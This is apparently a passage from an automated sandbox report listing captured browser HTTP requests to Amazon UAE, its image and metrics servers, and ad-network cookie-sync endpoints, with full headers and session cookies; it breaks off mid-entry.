ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronic/kamja/Events/2024/BTS24/PH1/Nav/OFC/bts_ofc_12_drawing_en._CB568181090_.png HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:646E5TEYAMSGQRNCHWPV$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3D646E5TEYAMSGQRNCHWPV%26m%3D1%26sc%3Dcsa%3AstartVL%26pc%3D15079%26at%3D15079%26t%3D1723729109593%26csmtags%3DstartVL%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D30082653031%26tid%3D1GXSAVZ7MBDVTNT0VYNB%26aftb%3D1%26lob%3D1:15079 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
    Source: global trafficHTTP traffic detected: GET /images/I/617Bf2FnoqL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/51jPbUNkr8L._AC_SF226,226_QL85_.jpg?aicid=discounts-widgets-horizonte HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71O65lbuaVL._AC_SF226,226_QL85_.jpg?aicid=discounts-widgets-horizonte HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:B82A0YC1SM3B4A82DCGS$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3DB82A0YC1SM3B4A82DCGS%26m%3D1%26sc%3Dcsa%3Alcp%26lcp%3D952%26pc%3D1462%26at%3D1462%26t%3D1723729109442%26csmtags%3Daui%3Asw%3Abrowser%3Aregister%3Asupported%26pty%3Di18n-preferences-web%26spty%3DsubSelectPreferences%26pti%3Dundefined%26tid%3DB82A0YC1SM3B4A82DCGS%26aftb%3D1%26lob%3D1:1461 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
    Source: global trafficHTTP traffic detected: GET /images/I/31NQAEzynfL.js?xcp HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.amazon.aesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71x9vjwX9IL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71s0nbDCiDL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /s/v3/pr?exlist=n-audex_n-weborama-pca_mp_af_n-sk_n-mediarithmics_g_bk_ox_index_n-semasio-ecm_n-telaria_an_fw_nsln_fbca_n-sc_pm_adb&fv=1.0&ex-pl-fbca=N3EFGF3vTTeRiAfcQ-KSyQ&a=cm&dmt=1&gdpr_consent=&ep=t0lYLix41FTrK7ny4hZcFrdz_z9ejwrwwMmktH_0a_Bk3ob6nVfH3G-L8rXTeABewck_PZfX9PGxlIiwFiwtO2RGObcU6pYaFqfxC1iCDxI HTTP/1.1Host: aax-eu.amazon-adsystem.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ad-id=A94x7cOy0E6VmJKhhQVGd4s; ad-privacy=0
    Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:646E5TEYAMSGQRNCHWPV$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3D646E5TEYAMSGQRNCHWPV%26m%3D1%26sc%3Dcsa%3Avl50%26vl50%3D3451%26pc%3D15079%26at%3D15079%26t%3D1723729109593%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D30082653031%26tid%3D1GXSAVZ7MBDVTNT0VYNB%26aftb%3D1%26lob%3D1:15079 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
    Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:646E5TEYAMSGQRNCHWPV$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3D646E5TEYAMSGQRNCHWPV%26m%3D1%26sc%3Dcsa%3Avl90%26vl90%3D6245%26pc%3D15080%26at%3D15080%26t%3D1723729109594%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D30082653031%26tid%3D1GXSAVZ7MBDVTNT0VYNB%26aftb%3D1%26lob%3D1:15080 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
    Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:646E5TEYAMSGQRNCHWPV$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3D646E5TEYAMSGQRNCHWPV%26m%3D1%26sc%3Dcsa%3Avl100%26vl100%3D6967%26pc%3D15080%26at%3D15080%26t%3D1723729109594%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D30082653031%26tid%3D1GXSAVZ7MBDVTNT0VYNB%26aftb%3D1%26lob%3D1:15080 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
    Source: global trafficHTTP traffic detected: GET /match?publisher_dsp_id=416&external_user_id=hOua8zJSTCWryW2WkZmIJQ&r=https%3A%2F%2Faax-eu.amazon-adsystem.com%2Fs%2Fecm3%3Fex%3DimprovedigitalHMT%26id%3D%7BPUB_USER_ID%7D&gdpr_consent= HTTP/1.1Host: match.360yield.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/619NJGBXTvL._AC_SF226,226_QL85_.jpg?aicid=discounts-widgets-horizonte HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71pFC0n2-AL._AC_SF226,226_QL85_.jpg?aicid=discounts-widgets-horizonte HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71vUumKmvkL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /setuid/a9?entity=188&code=yzz1lUhzR0mqhMyLk0ySdw&redir=https%3A%2F%2Faax-eu.amazon-adsystem.com%2Fs%2Fecm3%3Fex%3DxandrHMT%26id%3D%24UID&gdpr_consent= HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/51H4u4crV3L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:B82A0YC1SM3B4A82DCGS$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.295223.0%26id%3DB82A0YC1SM3B4A82DCGS%26ctb%3D1%26sc0%3Dp13n-rvi_desktop-rvi_0%26bb0%3D3006%26be0%3D3007%26pc0%3D4067%26ld0%3D4067%26t0%3D1723729112047%26pty%3Di18n-preferences-web%26spty%3DsubSelectPreferences%26pti%3Dundefined%26tid%3DB82A0YC1SM3B4A82DCGS%26aftb%3D1%26lob%3D1:4067 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
    Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:B82A0YC1SM3B4A82DCGS$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.295223.0%26id%3DB82A0YC1SM3B4A82DCGS%26sw%3D1280%26sh%3D1024%26vw%3D1263%26vh%3D907%26m%3D1%26sc%3DB82A0YC1SM3B4A82DCGS%26ue%3D9%26bb%3D112%26ns%3D404%26ne%3D459%26be%3D887%26fp%3D522%26fcp%3D522%26pc%3D1291%26tc%3D-1087%26na_%3D-1087%26ul_%3D-1723729107980%26_ul%3D-1723729107980%26rd_%3D-1723729107980%26_rd%3D-1723729107980%26fe_%3D-1084%26lk_%3D-1045%26_lk%3D-1045%26co_%3D-1045%26_co%3D-319%26sc_%3D-1045%26rq_%3D-318%26rs_%3D-41%26_rs%3D902%26dl_%3D-31%26di_%3D953%26de_%3D954%26_de%3D967%26_dc%3D1285%26ld_%3D1285%26_ld%3D-1723729107980%26ntd%3D-1%26ty%3D0%26rc%3D0%26hob%3D8%26hoe%3D9%26ld%3D1293%26t%3D1723729109273%26ctb%3D1%26rt%3D__ld%3A10-4-2-3-2-5-0%26csmtags%3Daui%7Caui%3Aaui_build_date%3A3.24.6-2024-08-09%7CmutObsYes%7Caui%3Acss%3Acache%7Caui%3Ajs%3Acache%7Cewc%3Aunpersist%7Cewc%3Aunpersist%3Aemptycart%7Cewc%3Abview%7Cewc%7Cewc%3Aunrec%7Cewc%3Acartsize%3A0%7Cewc%3Aaui%7Cnavbar%7Caui%3Asw%3Apage_proxy%3Ano_ctrl%7CFWCIMEnabled%7Cfls-eu-amazon-ae%7CperfYes%7CmutObsActive%7Cadblk_no%26viz%3Dvisible%3A8%26pty%3Di18n-preferences-web%26spty%3DsubSelectPreferences%26pti%3Dundefined%26tid%3DB82A0YC1SM3B4A82DCGS%26aftb%3D1%26lob%3D1:1296 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
    Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:B82A0YC1SM3B4A82DCGS$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3DB82A0YC1SM3B4A82DCGS%26ctb%3D1%26m%3D1%26sc%3DB82A0YC1SM3B4A82DCGS%26pc%3D4280%26at%3D4280%26t%3D1723729112260%26csmtags%3Dcsm-feature-touch-enabled%3Afalse%26pty%3Di18n-preferences-web%26spty%3DsubSelectPreferences%26pti%3Dundefined%26tid%3DB82A0YC1SM3B4A82DCGS%26aftb%3D1%26lob%3D1:4280 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
    Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:646E5TEYAMSGQRNCHWPV$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3D646E5TEYAMSGQRNCHWPV%26m%3D1%26sc%3Dcsa%3AstartVL%26pc%3D15079%26at%3D15079%26t%3D1723729109593%26csmtags%3DstartVL%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D30082653031%26tid%3D1GXSAVZ7MBDVTNT0VYNB%26aftb%3D1%26lob%3D1:15079 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
    Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:B82A0YC1SM3B4A82DCGS$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.295223.0%26id%3DB82A0YC1SM3B4A82DCGS%26sc0%3Daui%3Asw%3Appft%3Acallback_ricb%26bb0%3D74%26pc0%3D485%26ld0%3D485%26t0%3D1723729108465%26sc1%3Dportal-bb%26pc1%3D2%26ld1%3D2%26t1%3D1723729108095%26sc2%3DcsmCELLSframework%26bb2%3D891%26pc2%3D891%26ld2%3D891%26t2%3D1723729108871%26sc3%3DcsmCELLSpdm%26bb3%3D891%26pc3%3D893%26ld3%3D893%26t3%3D1723729108873%26sc4%3DcsmCELLSvpm%26bb4%3D893%26pc4%3D893%26ld4%3D893%26t4%3D1723729108873%26sc5%3DcsmCELLSfem%26bb5%3D894%26pc5%3D894%26ld5%3D894%26t5%3D1723729108874%26sc6%3Due_sushi_v1%26bb6%3D895%26pc6%3D896%26ld6%3D896%26t6%3D1723729108876%26ctb%3D1:1296 HTTP/1.1Host: 